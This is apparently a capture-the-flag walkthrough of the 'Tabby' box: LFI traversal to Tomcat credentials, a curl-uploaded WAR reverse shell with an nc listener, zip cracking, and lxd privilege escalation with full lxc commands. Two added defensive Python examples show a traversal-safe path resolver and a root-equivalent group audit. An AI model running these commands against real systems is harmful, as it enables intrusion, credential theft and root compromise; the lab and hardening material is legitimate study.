Enumerating port 80 we see a new subdomain, megahosting.htb.
Add it to your hosts file at /etc/hosts.
Foothold
----------------------------------------
There is an LFI at http://megahosting.htb/news.php?file= .
Requesting something like http://megahosting.htb/news.php?file=../../../../../etc/hosts shows that we have directory traversal.
Looking at port 8080 we find it is Tomcat 9, and the default page mentions that /etc/tomcat9/tomcat-users.xml holds the user info. Requesting that path through the LFI returns nothing, so we need the correct path.
Fetching http://megahosting.htb/news.php?file=../../../../../usr/share/tomcat9/etc/tomcat-users.xml instead gives us the creds:
```
<user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
```
Using the above we can log in to the host-manager GUI.
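The root cause of the foothold is that news.php joins the `file=` parameter onto a path without checking where the result ends up. The snippet below is an added example of the hardened form of that lookup; it is not code from the writeup or from the box. `NEWS_ROOT` is an assumed directory (the real one is not given on the page), `welcome.html` is a constructed article name, and the handler is assumed to receive the parameter already URL-decoded once, as a web framework would deliver it.

```python
import posixpath

# Assumed directory that news.php is allowed to read articles from
# (constructed for this example; the real path is not in the writeup).
NEWS_ROOT = "/var/www/html/news"


def resolve_news_file(user_value: str, root: str = NEWS_ROOT):
    """Map the ?file= parameter to a path under root, or return None.

    The caller is assumed to have URL-decoded user_value exactly once.
    """
    if not user_value or "\x00" in user_value:
        return None
    # A leading slash must not turn the value into an absolute path.
    relative = user_value.lstrip("/")
    # normpath collapses "." and ".." segments, so any escape from root
    # shows up as a result that no longer starts with root + "/".
    candidate = posixpath.normpath(posixpath.join(root, relative))
    if candidate == root or not candidate.startswith(root + "/"):
        return None
    return candidate


def classify(values):
    """Return {value: resolved_path_or_None} for a batch of ?file= values."""
    return {v: resolve_news_file(v) for v in values}


if __name__ == "__main__":
    samples = [
        "welcome.html",                                   # constructed, allowed
        "../../../../../etc/hosts",                       # traversal from the writeup
        "../../../../../usr/share/tomcat9/etc/tomcat-users.xml",
        "/etc/passwd",                                    # absolute path, treated as relative
        "sub/../welcome.html",                            # harmless ".." that stays inside root
    ]
    for value, path in classify(samples).items():
        print(f"{value!r:60} -> {path}")
```

The check is purely lexical, so on a real filesystem it should be followed by `os.path.realpath` on the opened file to catch symlinks pointing out of the directory, and ideally by an allowlist of known article names, which removes the path-handling question entirely.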
Reverse Shell
------------------------------------------
Tomcat lets us gain a reverse shell by uploading our payload as a .war file. We can use curl to upload it through the manager's text interface, which the manager-script role above allows.
To upload just do
```
curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file payload.war "http://10.10.10.194:8080/manager/text/deploy?path=/payload.war"
```
Set up a listener with nc -lvnp 1234, browse to tabby.htb:8080/payload.war and you should get a reverse shell.
We copied the zip to our machine by running base64 backupfilename.zip on the target and, locally, echo "<paste base64 code>" | base64 -d > backup.zip. Then:
```
fcrackzip -v -D -u -p ./rockyou.txt backup.zip
```
which returns the creds admin@it.
Trying them with su ash works, giving us a shell as ash and user.txt.
Privesc to Root
-------------------------------------------------
We see that ash is in the lxd group, so we follow the steps in https://www.hackingarticles.in/lxd-privilege-escalation/ and get root.
Following the article you end up with a tar.gz image file. Serve it over HTTP and fetch it on the target machine:
```
wget yourip/filename.tar.gz
```
Then run the following in order:
```
lxc image import ./yourfilename.tar.gz --alias myimage
lxc image list   # this should show that your image got loaded
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
cd /mnt/root
cd /root/
cat root.txt
```
You can also grab root's RSA key from /root/.ssh/id_rsa.
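Membership in lxd is root-equivalent by design: anyone who can talk to the LXD socket can start a privileged container with the host filesystem mounted, exactly as above. The audit below is an added example, not part of the writeup, that parses `/etc/group`-formatted text and reports members of groups that grant that kind of access. The `/etc/group` excerpt is constructed (GIDs and the other members are made up; only `ash` in `lxd` mirrors the page).

```python
# Constructed excerpt of /etc/group modelled on the writeup's finding that
# the user ash is in the lxd group. GIDs and other members are made up.
SAMPLE_GROUP_FILE = """\
root:x:0:
adm:x:4:syslog,ash
sudo:x:27:
lxd:x:116:ash
docker:x:998:
ash:x:1000:
"""

# Groups whose members can reach root without an exploit: sudo/wheel by
# policy, docker and lxd through the daemon socket (privileged container with
# / mounted), disk through raw read access to block devices.
ROOT_EQUIVALENT_GROUPS = {"sudo", "wheel", "docker", "lxd", "disk"}


def parse_group_file(text):
    """Return {group: [members]} from /etc/group-formatted text."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _password, _gid, members = line.split(":", 3)
        groups[name] = [m for m in members.split(",") if m]
    return groups


def root_equivalent_members(text, watch=ROOT_EQUIVALENT_GROUPS):
    """Return {group: [members]} for watched groups that have any members."""
    groups = parse_group_file(text)
    return {g: ms for g, ms in groups.items() if g in watch and ms}


if __name__ == "__main__":
    import sys
    # Pass a path (e.g. /etc/group) to audit a real file; otherwise use the sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_GROUP_FILE
    for group, members in sorted(root_equivalent_members(text).items()):
        print(f"{group}: {', '.join(members)}")
```

The member list in `/etc/group` misses users whose primary group (the GID field in `/etc/passwd`) is one of these, so a complete audit cross-references both files or simply runs `id` for each account. Removing ash from lxd, or running LXD only for dedicated administrators, is the fix the privesc section points at.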